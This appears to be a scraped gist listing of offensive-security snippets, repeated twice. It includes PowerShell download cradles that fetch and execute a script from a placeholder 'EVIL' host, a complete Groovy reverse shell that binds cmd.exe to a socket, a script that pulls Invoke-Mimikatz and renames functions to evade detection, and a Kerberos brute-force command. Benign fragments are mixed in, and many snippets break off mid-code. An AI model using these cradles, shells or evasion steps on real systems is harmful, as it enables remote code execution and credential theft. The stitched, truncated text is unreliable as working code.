illwill xillwillx

## DownloadCradles.ps1
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')

# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

# Msxml2.XMLHTTP COM object

## revsh.groovy
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

## Authproxyserver.ps1
#DISCLAIMER
#I'm not the original author of the script...
#Original git repo vanished

function String-to-ByteArray ($String)
{
	$ByteArray=@()
	For ( $i = 0; $i -lt ($String.Length/2); $i++ )
	{
		$Chars=$String.Substring($i*2,2)

## PowerView-3.0-tricks.ps1
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
#   tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
#   https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

# New function naming schema:
#   Verbs:
#       Get : retrieve full raw data sets
#       Find : ‘find’ specific data entries in a data set

## minicars.sh
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1

# Uncomment below two lines to clean comments from all .ps1 files in ./
#find ./ -name "*.ps1" -exec sed -i -e '/^<#/,/^#>/d' {} \;
#find ./ -name "*.ps1" -exec sed -i -e 's/#.*$//' {} \;

sed -i -e '/^<#/,/^#>/d' Invoke-Mimikatz.ps1
sed -i -e 's/#.*$//' Invoke-Mimikatz.ps1
sed -i -e's/DumpCerts/GimmeCerts/g' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCreds/GimmeCreds/g' Invoke-Mimikatz.ps1

## twitterfavlinks.py
# twitterfavlinks.py - Throw back all your favorites that contain a url. Get any applicable redirects. Note there are Twitter API
# limits, so if you have a gazillion favorites, you probably won't get them all. YMMV
#
# Author: @curi0usJack
#
# Dependencies:
#   Tweepy: sudo pip install tweepy
#   Twitter API access. Set up here: https://apps.twitter.com/

import tweepy

## .htaccess
	#
	# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
	#
	# Note this version requires Apache 2.4+
	#
	# Save this file into something like /etc/apache2/redirect.rules.
	# Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom
	#
	# Include /etc/apache2/redirect.rules
	#

## until_nmap.sh
#!/bin/bash

# Nmap can crash when scanning large ranges
# To use this script, start your scan with whatever
# nmap options you want making sure you use -oA <filename>
# or -oG <filename> (you need the gnmap file) then cancel
# the scan. replace <filename> below and run this script.
# It will also record when it failed to a file called failed.txt

until nmap --resume <filename>.gnmap

## kerberos_attacks_cheatsheet.md

      
              1 file
            
          
              373 forks
            
          
              5 comments
            
          
              1087 stars
            
          
                TarlogicSecurity
                / kerberos_attacks_cheatsheet.md
            
            
              Created
              May 14, 2019 13:33
            
              
                A cheatsheet with commands that can be used to perform kerberos attacks
              
          
    Kerberos cheatsheet

Bruteforcing

With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:

  
## autoProc.py
#!/usr/bin/env python
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# A similar approach to smbexec but executing commands through WMI.
# Main advantage here is it runs under the user (has to be Admin)
# account, not SYSTEM, plus, it doesn't generate noisy messages
	# normal download cradle
	IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

	# PowerShell 3.0+
	IEX (iwr 'http://EVIL/evil.ps1')

	# hidden IE com object
	$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

	# Msxml2.XMLHTTP COM object
	String host="localhost";
	int port=8044;
	String cmd="cmd.exe";
	Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
	#DISCLAIMER
	#I'm not the original author of the script...
	#Original git repo vanished

	function String-to-ByteArray ($String)
	{
	$ByteArray=@()
	For ( $i = 0; $i -lt ($String.Length/2); $i++ )
	{
	$Chars=$String.Substring($i*2,2)
	# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
	# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

	# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
	# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

	# New function naming schema:
	# Verbs:
	# Get : retrieve full raw data sets
	# Find : ‘find’ specific data entries in a data set
	wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1

	# Uncomment below two lines to clean comments from all .ps1 files in ./
	#find ./ -name "*.ps1" -exec sed -i -e '/^<#/,/^#>/d' {} \;
	#find ./ -name ".ps1" -exec sed -i -e 's/#.$//' {} \;

	sed -i -e '/^<#/,/^#>/d' Invoke-Mimikatz.ps1
	sed -i -e 's/#.*$//' Invoke-Mimikatz.ps1
	sed -i -e's/DumpCerts/GimmeCerts/g' Invoke-Mimikatz.ps1
	sed -i -e 's/DumpCreds/GimmeCreds/g' Invoke-Mimikatz.ps1
	# twitterfavlinks.py - Throw back all your favorites that contain a url. Get any applicable redirects. Note there are Twitter API
	# limits, so if you have a gazillion favorites, you probably won't get them all. YMMV
	#
	# Author: @curi0usJack
	#
	# Dependencies:
	# Tweepy: sudo pip install tweepy
	# Twitter API access. Set up here: https://apps.twitter.com/

	import tweepy
	#
	# TO-DO: set \|DESTINATIONURL\| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
	#
	# Note this version requires Apache 2.4+
	#
	# Save this file into something like /etc/apache2/redirect.rules.
	# Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom
	#
	# Include /etc/apache2/redirect.rules
	#
	#!/bin/bash

	# Nmap can crash when scanning large ranges
	# To use this script, start your scan with whatever
	# nmap options you want making sure you use -oA <filename>
	# or -oG <filename> (you need the gnmap file) then cancel
	# the scan. replace <filename> below and run this script.
	# It will also record when it failed to a file called failed.txt

	until nmap --resume <filename>.gnmap
	#!/usr/bin/env python
	# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
	#
	# This software is provided under under a slightly modified version
	# of the Apache Software License. See the accompanying LICENSE file
	# for more information.
	#
	# A similar approach to smbexec but executing commands through WMI.
	# Main advantage here is it runs under the user (has to be Admin)
	# account, not SYSTEM, plus, it doesn't generate noisy messages